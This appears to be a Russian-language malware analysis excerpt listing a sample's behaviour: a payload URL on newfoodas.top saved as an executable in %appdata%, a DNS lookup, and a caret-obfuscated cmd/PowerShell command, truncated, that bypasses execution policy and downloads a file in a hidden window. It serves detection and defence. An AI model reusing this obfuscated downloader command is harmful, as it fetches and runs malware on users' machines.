Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poW^ER^sHEl^l.Exe^ ^-Ex^eC^UT^ioNPolicy^ b^y^Pas^s -^No^ProFIL^E^ -Win^dOWs^t^yL^e^ h^iD^DEN^ ^(ne^W-OBJEcT^ ^sySteM.^net^.^webCl^i^eN^T).dow^n^l^o^adF^I^Le(^'http://newfooda...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "poW^ER^sHEl^l.Exe^ ^-Ex^eC^UT^ioNPolicy^ b^y^Pas^s -^No^ProFIL^E^ -Win^dOWs^t^yL^e^ h^iD^DEN^ ^(ne^W-OBJEcT^ ^sySteM.^net^.^webCl^i^eN^T).dow^n^l^o^adF^I^Le(^'http://newfooda...' (со скрытым окном)